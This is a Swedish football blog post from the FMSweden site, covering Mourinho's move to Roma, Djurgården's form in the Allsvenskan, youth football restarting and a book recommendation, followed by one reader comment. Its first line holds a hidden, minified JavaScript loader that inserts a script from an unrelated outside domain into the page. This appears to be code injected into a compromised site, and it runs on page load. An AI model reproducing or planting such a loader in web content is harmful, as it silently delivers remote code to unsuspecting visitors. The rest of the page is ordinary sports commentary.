;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Fabbes blogg: En blandning av åsikter – FMSweden
Meny Stäng

Fabbes blogg: En blandning av åsikter

Veckans blogg blir en kompott av åsikter från fotbollsvärlden. Häng med!

Jag har alltid fascinerats av José Mourinho. Även när jag avskydde honom som allra mest under hans period i Manchester United har det alltid funnits något som gjort honom intressant. För mindre än en månad sedan fick han sparken av Tottenham, och tanken var att det var bäst för alla. Mourinho kändes som så många gånger förr slut, och den här gången skulle han nog bli borta en längre tid. Men nu står vi här några veckor sedan och undrar vad som egentligen hänt när det nu står klart att han är ny tränare för Roma.

Hur är då känslan inför hela den här situationen? Konstigt nog är den precis som vanligt. Det känns spännande! Det är helt ofattbart om man följt Mourinhos senaste år, och framförallt hans eftermäle i klubbarna han varit i, att man kan stå här och vara spänd på vad han ska hitta på den här gången. Men så är verkligen fallet för mig, och jag hoppas verkligen för både hans och hela fotbollsvärldens skull att Roma passar honom perfekt. För skulle han misslyckas nu, då får han väl inte fler chanser?

—————————————

I den svenska fotbollen behöver vi egentligen bara prata om ett lag: Djurgårdens IF. Helvete vad man imponerat i inledningen av årets allsvenska. Måndagens styrkedemonstration var något av det häftigaste jag sett i allsvenskan på väldigt länge, och nu är det helt plötsligt svårt att se vad och vilka som ska stoppa huvudstadslaget från Östermalm? Samtidigt vill jag minnas att jag, och många andra, satt med precis samma känsla efter IFK Norrköpings inledning i fjol. Så vi ska nog sätta oss ner lite i båten och inte ropa hej än. För är det något jag lärt mig om allsvenskan, så är det att den aldrig har avgjorts efter fyra omgångar.

—————————————

Än en gång lyssnade Anders Tegnell, Amanda Lind och övriga i maktposition på mig och mina åsikter. Nåja, det kanske var några till som drog en lans för ungdomsfotbollen men jag tar ändå åt mig den största äran. Kidsen på mitt jobb är överlyckliga och pratar redan om helgens matcher, och det märks verkligen hur barn och ungdomar fått upp glädjen med sitt idrottande igen. Tänk att det kan vara så viktigt att få tävla trots att det enligt vissa forskare verkar vara det värsta barn kan göra.

—————————————

Sist men inte minst ska ni få ett boktips av mig. Har precis börjat läsa ”A season with Verona” av Tim Parks. En bok som fått många utmärkelser, och av många blivit omnämnd som en av de bästa fotbollsböckerna som skrivits. Och av det jag läst hittills kan jag bara instämma med hyllningskören. Författaren följer med Hellas Veronas supportrar på samtliga matcher under en säsong i början av 00-talet och berättar både om matcherna, men likväl om livet utanför arenorna i anslutning till matcherna. Oerhört intressant och givande läsning.

Tack för den här veckan!

Please wait...

Liknande Inlägg

2 kommentarer

  1. Phansell

    Mourinho i Roma känns som du säger spännande. En del utav mig hoppas det går riktigt bra och en annan del hoppas på katastrof. Vi får se vilken sida som får rätt. Men sumpar han det är det nog som du säger, får han verkligen fler chanser då?

    Nu håller jag på AIK, men jävlar vad Djurgården ser bra ut. Läskigt bra och stort grattis till alla deras supportrar.

    Spännande boktips på slutet. Likt Micke skriver jag upp denna titeln 🙂

Lämna ett svar